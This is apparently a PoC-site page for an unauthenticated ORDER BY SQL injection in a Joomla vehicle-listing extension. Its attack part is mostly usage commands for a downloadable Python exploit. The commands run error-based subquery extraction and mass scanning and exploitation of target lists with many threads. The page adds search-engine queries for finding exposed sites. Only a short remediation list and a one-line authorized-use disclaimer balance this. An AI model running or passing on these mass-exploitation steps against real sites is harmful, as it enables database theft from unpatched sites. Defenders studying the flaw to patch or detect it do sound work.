CVE-2026-101108 — OrdaSoft Joomla Vehicle Manager (Free) Unauthenticated SQL Injection
September 29, 2026 · 48 views
OrdaSoft Vehicle Manager (Free) for Joomla ≤ 6.5.7: unauthenticated SQL injection (CWE-89) via order_field and order_direction concatenated into unquoted ORDER BY in site/vehiclemanager.php (com_vehiclemanager). Escaping is ineffective for sort keys. Public category, search, and all-vehicles views. Fixed in 6.5.8+. CVSS 4.0 9.3 Critical. Python PoC: check, error-based exploit, mass -j.
Description
Overview
CVE-2026-101108 affects OrdaSoft Vehicle Manager (Free) for Joomla — extension ≤ 6.5.7. Fixed in 6.5.8+.
| | |
|---|---|
| Component | com_vehiclemanager |
| File | site/vehiclemanager.php |
| Parameters | order_field, order_direction → ORDER BY (unquoted) |
| Auth | None (public category / search / all-vehicles views) |
| CWE | CWE-89 SQL Injection |
| CVSS 4.0 | 9.3 Critical (Joomla CNA) |
| Credit | Ala Arfaoui (CNA) |
Why escaping fails: Input may pass through escapers meant for string literals, but ORDER BY sort keys are concatenated as SQL structure — not quoted strings. Attackers supply expressions (e.g. error-based subqueries) instead of column names. The CNA documents this escape bypass pattern for CVE-2026-101108.
Affected anonymous frontend entry points:
- Category listing (
showCategory) - Search (
search/ related tasks) - All-vehicles listing (
showVehiclesand similar)
PoC page: https://pocbit.org/pocs/cve-2026-101108
GitHub: murrez/CVE-2026-101108
Bundled tool (Python 3)
Download poc.py from this page (View exploit code).
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| Mode | Behavior |
|------|----------|
| check | Fingerprint com_vehiclemanager, manifest version, catid / Itemid, SQLi proof; --aggressive tries SELECT VERSION() |
| exploit | Error-based EXTRACTVALUE-style double query via ORDER BY |
| Mass | --list + -j → hits.txt, exploited.txt |
Exploit vectors (first successful wins): order_field GET, order_direction GET (asc,<subquery>), order_field POST, order_direction POST. Force one with --vector.
Example HTTP surface
GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc
Search baseline (built by PoC):
GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all
Version detection
/administrator/components/com_vehiclemanager/vehiclemanager.xml
Version ≤ 6.5.7 → likely vulnerable. ≥ 6.5.8 → patched.
OrdaSoft batch context (Sep 2026)
Same disclosure window as Real Estate Manager (CVE-2026-100752 / CVE-2026-100753). Patch all OrdaSoft Joomla extensions you run.
| CVE | Product | Issue | Fixed | |-----|---------|-------|-------| | CVE-2026-101108 | Vehicle Manager (Free) | Unauth ORDER BY SQLi | 6.5.8 | | CVE-2026-100752 | Real Estate Manager | Unauth ORDER BY SQLi | 6.7.9 |
Hunting (examples)
body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"
Remediation
- Upgrade to Vehicle Manager 6.5.8+.
- Inventory other OrdaSoft components on the same Joomla site.
- Restrict or monitor
com_vehiclemanagersort parameters until patched.
Legal and ethical use
Authorized security testing and patch validation only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- JoomlaCVE-2026-101110critical
CVE-2026-101110 — OrdaSoft Joomla Book Library (Free) Unauthenticated SQL Injection
OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6: unauthenticated SQL injection (CWE-89) in books() via field/direction sort params — weak select substring blacklist + protectInjectionWithoutQuote, unquoted ORDER BY, session prime + `-- xselect` bypass (com_booklibrary). Fixed in 6.4.7+. CVSS 4.0 9.3 Critical. Python PoC: check, exploit, mass -j.
- JoomlaCVE-2026-100752high
CVE-2026-100752 — OrdaSoft Joomla Real Estate Manager (Free) Unauthenticated SQL Injection
OrdaSoft Real Estate Manager (Free) for Joomla ≤ 6.7.8: unauthenticated SQL injection (CWE-89) via order_field concatenated into ORDER BY in site/realestatemanager.php (com_realestatemanager). Public category, search, and listing views — no auth. Fixed in 6.7.9+. Python PoC: fingerprint, check, error-based exploit, mass -j; legacy order_direction POST fallback.
- JoomlaCVE-2026-88854critical
CVE-2026-88854 — OrdaSoft Joomla Gallery ≤ 6.2.6 Unauthenticated SQL Injection
Unauthenticated SQL injection in OrdaSoft **OS Gallery** (`com_osgallery` / `com_osgallery_light` ≤ 6.2.6) via the image **search** parameter (`textsearch`).
- JoomlaCVE-2026-94130critical
CVE-2026-94130 — Joomla YouTube Gallery Unauthenticated SQL Injection
Unauthenticated SQL injection (CWE-89, CVSS 4.0 9.3 Critical) in YouTube Gallery for Joomla (com_youtubegallery, joomlaboat.com) ≤ 5.7.2 — video search and sorting on the public yg_api=1 JSON API (ygsearchfields, ygsearchquery, sort params). Fixed in 5.7.3.